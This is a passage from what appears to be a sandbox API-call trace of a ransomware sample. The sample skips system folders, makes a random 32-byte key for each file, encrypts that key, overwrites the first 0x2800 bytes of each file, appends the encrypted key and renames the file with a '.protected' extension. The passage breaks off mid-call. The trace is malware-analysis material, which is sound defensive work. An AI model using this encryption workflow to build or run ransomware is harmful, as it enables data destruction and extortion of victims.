MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kvahml13uo-cfvabio9d.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kvahml13uo-cfvabio9d.xlsx.protected")) returned 1 [0086.843] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="Windows") returned -1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="Program Files") returned -1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="Program Files (x86)") returned -1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="$Recycle.bin") returned 1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="System Volume Information") returned -1 [0086.844] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp") returned 70 [0086.844] StrStrIW (lpFirst="LjdEIZIp4ZLwh.bmp", lpSrch=".protected") returned 0x0 [0086.844] lstrcmpW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0086.844] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.844] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ljdeizip4zlwh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp") returned 70 [0086.844] StrStrW (lpFirst="LjdEIZIp4ZLwh.bmp", lpSrch=".txt") returned 0x0 [0086.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp") returned 70 [0086.845] StrStrW (lpFirst="LjdEIZIp4ZLwh.bmp", lpSrch=".rar") returned 0x0 [0086.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp") returned 70 [0086.845] StrStrW (lpFirst="LjdEIZIp4ZLwh.bmp", lpSrch=".zip") returned 0x0 [0086.845] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.845] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.846] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.846] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.846] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.846] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.846] CloseHandle (hObject=0xd8) returned 1 [0086.847] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp.protected") returned 80 [0086.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ljdeizip4zlwh.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ljdeizip4zlwh.bmp.protected")) returned 1 [0086.849] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="Windows") returned -1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="Program Files") returned -1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="Program Files (x86)") returned -1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="$Recycle.bin") returned 1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="System Volume Information") returned -1 [0086.849] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf") returned 65 [0086.849] StrStrIW (lpFirst="mSFM2TxD.pdf", lpSrch=".protected") returned 0x0 [0086.849] lstrcmpW (lpString1="mSFM2TxD.pdf", lpString2="RESTORE_FILES.txt") returned -1 [0086.849] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.849] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\msfm2txd.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf") returned 65 [0086.850] StrStrW (lpFirst="mSFM2TxD.pdf", lpSrch=".txt") returned 0x0 [0086.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf") returned 65 [0086.850] StrStrW (lpFirst="mSFM2TxD.pdf", lpSrch=".rar") returned 0x0 [0086.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf") returned 65 [0086.850] StrStrW (lpFirst="mSFM2TxD.pdf", lpSrch=".zip") returned 0x0 [0086.850] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.851] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.851] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.851] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.852] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.852] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.852] CloseHandle (hObject=0xd8) returned 1 [0086.852] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf.protected") returned 75 [0086.852] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\msfm2txd.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\msfm2txd.pdf.protected")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="Windows") returned -1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="Program Files") returned -1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="Program Files (x86)") returned -1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="$Recycle.bin") returned 1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="System Volume Information") returned -1 [0086.854] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp") returned 75 [0086.854] StrStrIW (lpFirst="mTNvodTweqYxgd8NuJ.bmp", lpSrch=".protected") returned 0x0 [0086.854] lstrcmpW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0086.854] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.854] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mtnvodtweqyxgd8nuj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp") returned 75 [0086.855] StrStrW (lpFirst="mTNvodTweqYxgd8NuJ.bmp", lpSrch=".txt") returned 0x0 [0086.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp") returned 75 [0086.855] StrStrW (lpFirst="mTNvodTweqYxgd8NuJ.bmp", lpSrch=".rar") returned 0x0 [0086.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp") returned 75 [0086.855] StrStrW (lpFirst="mTNvodTweqYxgd8NuJ.bmp", lpSrch=".zip") returned 0x0 [0086.855] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.856] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.856] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.856] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.857] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.857] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.857] CloseHandle (hObject=0xd8) returned 1 [0086.857] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp.protected") returned 85 [0086.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mtnvodtweqyxgd8nuj.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mtnvodtweqyxgd8nuj.bmp.protected")) returned 1 [0086.859] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="Windows") returned -1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="Program Files") returned -1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="Program Files (x86)") returned -1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="$Recycle.bin") returned 1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="System Volume Information") returned -1 [0086.859] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3") returned 68 [0086.859] StrStrIW (lpFirst="NgnQ0H Oycy.mp3", lpSrch=".protected") returned 0x0 [0086.859] lstrcmpW (lpString1="NgnQ0H Oycy.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0086.859] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.859] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ngnq0h oycy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3") returned 68 [0086.860] StrStrW (lpFirst="NgnQ0H Oycy.mp3", lpSrch=".txt") returned 0x0 [0086.860] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3") returned 68 [0086.860] StrStrW (lpFirst="NgnQ0H Oycy.mp3", lpSrch=".rar") returned 0x0 [0086.860] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3") returned 68 [0086.860] StrStrW (lpFirst="NgnQ0H Oycy.mp3", lpSrch=".zip") returned 0x0 [0086.860] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.861] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.861] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.861] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.861] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.861] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.861] CloseHandle (hObject=0xd8) returned 1 [0086.862] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3.protected") returned 78 [0086.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ngnq0h oycy.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ngnq0h oycy.mp3.protected")) returned 1 [0086.864] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="Windows") returned -1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="Program Files") returned -1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="Program Files (x86)") returned -1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="$Recycle.bin") returned 1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="System Volume Information") returned -1 [0086.864] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi") returned 66 [0086.864] StrStrIW (lpFirst="O37HQOVWk.avi", lpSrch=".protected") returned 0x0 [0086.864] lstrcmpW (lpString1="O37HQOVWk.avi", lpString2="RESTORE_FILES.txt") returned -1 [0086.864] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.864] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\o37hqovwk.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi") returned 66 [0086.864] StrStrW (lpFirst="O37HQOVWk.avi", lpSrch=".txt") returned 0x0 [0086.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi") returned 66 [0086.864] StrStrW (lpFirst="O37HQOVWk.avi", lpSrch=".rar") returned 0x0 [0086.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi") returned 66 [0086.865] StrStrW (lpFirst="O37HQOVWk.avi", lpSrch=".zip") returned 0x0 [0086.865] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.865] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.865] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.866] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.866] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.866] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.866] CloseHandle (hObject=0xd8) returned 1 [0086.867] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi.protected") returned 76 [0086.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\o37hqovwk.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\o37hqovwk.avi.protected")) returned 1 [0086.868] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="Windows") returned -1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="Program Files") returned -1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="Program Files (x86)") returned -1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="$Recycle.bin") returned 1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="System Volume Information") returned -1 [0086.868] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv") returned 75 [0086.868] StrStrIW (lpFirst="oDE5vXHnCSjoYziwyf.mkv", lpSrch=".protected") returned 0x0 [0086.868] lstrcmpW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0086.868] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.868] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ode5vxhncsjoyziwyf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.869] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv") returned 75 [0086.869] StrStrW (lpFirst="oDE5vXHnCSjoYziwyf.mkv", lpSrch=".txt") returned 0x0 [0086.869] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv") returned 75 [0086.869] StrStrW (lpFirst="oDE5vXHnCSjoYziwyf.mkv", 